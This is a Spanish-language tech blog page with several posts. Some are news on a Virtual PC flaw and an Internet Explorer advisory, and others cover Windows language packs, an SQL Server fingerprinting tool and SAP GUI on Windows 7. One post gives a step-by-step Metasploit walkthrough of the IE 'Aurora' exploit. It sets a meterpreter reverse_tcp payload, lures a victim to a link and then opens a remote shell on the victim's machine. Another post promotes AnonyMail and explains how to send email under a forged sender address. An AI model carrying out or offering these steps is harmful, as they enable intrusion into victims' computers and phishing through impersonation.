Rincón Informático

Un autor de exploits de Core Security Technologies ha descubierto una seria vulnerabilidad que expone a los usuarios del software de virtualización Microsoft Virtual PC a los ataques de hackers maliciosos.

La vulnerabilidad, la cual no tiene parche, esencialmente permite a un atacante eludir varias de la principales mitigaciones de seguridad — Data Execution Prevention (DEP), Safe Exception Handlers (SafeSEH) y Address Space Layout Randomization (ASLR) — para explotar el sistema operativo Windows.

Como resultado, algunas aplicaciones con fallas que no son explotables cuando corren en un sistema operativo no-virtualizado se vuelven explotables su corren dentro de un SO huésped en Virtual PC, según Ivan Arce, Jefe de Tecnología de Core.

La falla, descubierta por el escritor de exploits Nicolás Enonomou, existe en el administrador de memoria del Monitor de Máquina Virtual. Provoca que las páginas de memoria por encima del nivel de 2GB sean accedidas con privilegios de lectura o lectura/escritura por los programas en espacio de usuario en un sistema operativo huésped.

El software afectado incluye Microsoft Virtual PC 2007, Virtual PC 2007 SP1, Windows Virtual PC y Microsoft Virtual Server 2005. En Windows 7 la característica del modo XP también es afectado por la vulnerabilidad.

En particular, una aplicación vulnerable corriendo en Modo Windows XP en Windows 7 puede ser explotable en un ambiente virtual, en tanto la misma aplicación corriendo directamente en un sistema operativo Windows XP SP3 no.

La tecnología Microsoft HyperV no es afectada por este problema.

Fuente

El pasado Martes 9 de Marzo, Microsoft publicó un “Security Advisory (981374)”. La vulnerabilidad es un use-after-free (Referencia no valida a un puntero) la vulnerabilidad se encuentra en Iepeers.dll y sólo afecta a las versiones de Internet Explorer 6 y 7.

Es posible bajo determinadas condiciones para el puntero no válido, tener acceso después de que se haya eliminado un objeto. En un ataque, al tratar de acceder a un objeto liberado Internet Explorer puede permitir la ejecución remota de código.

Si un atacante explota esta vulnerabilidad podría obtener los mismos privilegios del usuario actualmente logueado en el computador. Así que a los usuarios de estas versiones de Internet Explorer se les recomineda que se actualicen a la version más reciente.

Para esta vulnerabilidad ya existe un exploit, la forma en que se puede explotar la vulnerabilidad la puede encontrar en esta PAGINA

Referencias

Microsoft Security Advisory

cve-2010-0806

AnonyMail es una herramienta que ha sido creada por Xa0s de professional-hacker que como su nombre lo indica sirve para enviar Emails anónimos.

La aplicación permite enviar correos electrónicos mediante SMTP, utilizando un email nuestro pero con un correo falso. Es decir, a la persona que le enviemos el email podemos enviárselo con el que nosotros queramos.

Además soporta HTML por lo que podemos enviar mensajes perfectamente utilizando HTML a nuestro gusto.

También se puede adjuntar algún archivo que quieras.

Si quieres enviar un email utilizando un correo de Gmail, en Servidor SMTP debes poner “smtp.gmail.com” y en puerto “465″. Luego tú correo, contraseña y luego llenas los demas datos que te pide que es el email de la persona a quien se lo quieres enviar, el correo falso con que quieres que le llegue el email, asunto, si quieres adjuntar algún archivo y el mensaje para el cual puedes utilizar HTML.

Si quieres enviar un email utilizando un correo Hotmail/Live el Servidor SMTP es “smtp.live.com” y el puerto es “25″.

Pueden enviarlo con el de ustedes o crear un correo nuevo para la ocasión.

Por el momento solo esta para windows.

Descargar:
AnonyMail

La aplicación utiliza Codejock. Si no tienen las dependencias se las dejo.

Codejock

Fuente: Professional-Hacker

Hace pocos días,  Google y otras grandes empresas recibieron un ciberataque denominado “Aurora”  el cual aprovechaba una nueva vulnerabilidad de tipo 0-day en Internet explorer que permite  la ejecución remota de código en las maquinas vulnerables. Cito la noticia:

McAfee Labs ha estado trabajando contra reloj para evaluar cómo se realizó el ciberataque al que han bautizado como Aurora y que afectó tanto a Google como a varias decenas de empresas y a sus servidores de correo. Una de las causas de este ataque ha sido la aparición de una nueva vulnerabilidad Zero Day en Internet Explorer, que se descubrió recientemente gracias a esas tareas de investigación y sobre la que Microsoft ya ha publicado sus propias notas.

Según los estudios de McAfee, los intrusos ganaron accesos a las organizaciones mandando ataques a medida a ciertas personas que se supone que tienen permisos de acceso especiales. La combinación de mensajes que parecían provenir de fuentes de confianza y de la vulnerabilidad en IE puede haber sido la base de dichos ataques, según la firma de seguridad

Observando el impacto que tuvo dicha vulnerabilidad, acá en RinconInformatico.NET quisimos hacer una prueba de concepto (al igual como lo hicimos con una vulnerabilidad de Firefox) para comprobar lo fácil que es la explotacion de este fallo.

¿Que necesitamos?

• Metasploit en su ultima versión ( o actualizarlo)
• Una victima

Antes de empezar es oportuno aclarar que esta prueba fue hecha con un Windows XP SP2  e I6, según otras fuentes el exploit que se encuentra en el metasploit solo es efectivo con IE6, sin embargo, el exploit que pueden encontrar aqui sirve para todas las versiones de Internet explorer.

Y empezamos…

Después de tener nuestro metasploit framework abrimos la consola:

msfconsole

Ahora procedemos a seleccionar el exploit y darle los parámetros adecuados:

use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (nuestra ip)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

Después de lanzar el exploit, debemos decirle a la víctima que acceda al siguiente enlace (LOCAL IP) en este caso es el siguiente:

http://192.168.1.4:8080/

Inmediatamente nuestra víctima abre el enlace malicioso veremos como  el metasploit empieza a trabajar, hasta que nos abre una sesión. El siguiente paso es seleccionar la sesión:

sessions -i 1 // donde 1 es el id de la sesión que se ha creado.

Si todo ha salido bien tendremos  el prompt de meterpreter, desde donde podemos hacer muchas cosas interesantes, como tomar un screenshot del escritorio de la víctima, saber el nombre del equipo con su grupo de trabajo,  o en su defecto tener un shell remota de nuestro equipo víctima. algunos ejemplos:

meterpreter > use espia
meterpreter > screenshot victima1.bmp // el screenshot quedara en tu escritorio

meterpreter> shell // obtendremos una shell donde podemos hacer lo que deseemos.

Consideraciones..

• Con este método, solo es vulnerable ie6
• Un antivirus actualizado detecta el ataque (comprobado con nod32 y mcafee)
• Obviamente si la víctima cierra el internet explorer se caera el ataque.

Por ultimo, no sobra decir que este es un laboratorio informativo, es decir, un  prueba de concepto, el que haga esto no es un hacker. La idea de esta entrada no es ejecutar un exploit, es tratar de entender como es su funcionamiento y la forma de implementarlo.

Muy seguramente alguno de ustedes  fieles lectores han recibido o conocen  alguien que ha recibido una laptop que ha sido mandada desde otro país, los motivos son varios:

• Mas tecnología.
• Menor precio.
• Diversidad de marcas.
• Entre otros…

Uno de los principales inconvenientes con este tipo de laptop’s es el idioma que trae configurado el sistema operativo (generalmente Windows), muchos usuarios pensaran que la única solución a este problema es formatear e instalar una versión en español,  sin embargo existe una aplicacion llamada Windows XP Multilingual User Interface (MUI) la cual nos ayuda a traducir todo nuestro sistema operativo sin formatear ni perder ningún dato. El procedimiento que debes seguir para pasar de ingles a español tu windows, es el siguiente:

1. Debemos prevenir algún error, así que creamos un punto de restauración en nuestro sistema (inicio – todos los programas -  accesorios – herramientas del sistema – restaurar sistema) allí escoges  la opción de crear un punto de restauración y sigues las instrucciones. Esto nos ayudara a que si falla  la traducción del sistema operativo podamos volver a dejar todo como estaba.
2. Descargamos la aplicacion desde aca.
3. Lo descomprimos y ejecutamos el archivo MUISETUP.EXE.
4. Ahora leemos TODA la licencia y respondemos si estamos o no de acuerdo con la misma.



5. En el siguiente pantalla seleccionamos la casilla spanish e indicamos que este sera nuestro idioma predeterminado.



6. Por ultimo damos ok, esperamos a que se instale y reiniciamos.
7. Solo nos queda ir a panel de control- Configuraciones regionales y de idiomas, y seleccionamos el idioma español en TODAS las pestañas.



8. Reiniciamos de nuevo para visualizar los cambios.

Este pack tiene la traducción solamente de ingles a español, sin embargo  para aquellos usuarios que tengan su sistema operativo en otros idiomas les dejo el paquete necesario, solo basta instalarlo de la misma forma que  hemos explicado anteriormente:

• Chino
• Frances
• Aleman
• Koreano
• Portugues
• Ruso
• Turco

Interesante herramienta a escrito Nelson Brito, sirve para identificar versiones de la famosa base de Datos de Microsoft SQL server, es capaz de identificar las versiones de SQL Server 2000, SQL Server 2005 y SQL Server 2008.

Como punto importante se puede resaltar que esta herramienta es sumamente veloz y usa un algoritmo de probabilidad para determinar las versiones del servidor con el motor de bases de datos

Cabe resaltar que esta herramienta es una BETA y la idea es descargarla, probarla y si hay problemas ayudar a identificarlos.

Descargar MSQLFP desde Google Code.

Con la liberación por parte de Microsoft de Windows 7, algunas empresas han pensado migrar sus escritorios de trabajo a este Sistema Operativo.  Sin embargo conozco un par de implementaciones donde se estaba realizando esta operación y tuvieron muchos problemas principalmente por las versiones de sus SAP GUI For Windows, los cuales no funcionaban correctamente en Windows 7.

SAP se encuentra desarrollando el SAPGUI 7.20 For Windows y se suponía que saldría para las mismas fechas del lanzamiento de Windows 7, sin embargo como dichas fechas fueron modificadas por Microsoft, SAP no ha liberado aun su nueva versión de SAP GUI.

Sin embargo para poder ejecutar SAP GUI For Windows en Windows 7 no es necesario tener la versión 7.20, puesto podemos tenerlo, pero con los siguientes aditamentos:

• SAP GUI For Windows 7.10 Core, Nivel de parche 15
• BW 3.5 para SAP GUI 7.10 nivel de parche 8
• BI 7.0 para SAP GUI 7.10 nivel de parche 1001
• KW para SAP GUI 7.10 nivel de parche 6

En RinconInformatico hemos visto un par de parches para SAP GUI y estos serán de mucha ayuda si no saben cómo descargarlos desde el Markplace de SAP.

Cabe anotar como recordatorio que:

• SAP GUI 7.10 solo se mantendrá en vigencia hasta el 2011.
• Solo se soportara Windows 7 en 3 versiones (Professional, Ultimate, Enterprise)
• El soporte de Office 2010 SOLO se tendrá en cuenta para SAP GUI 7.20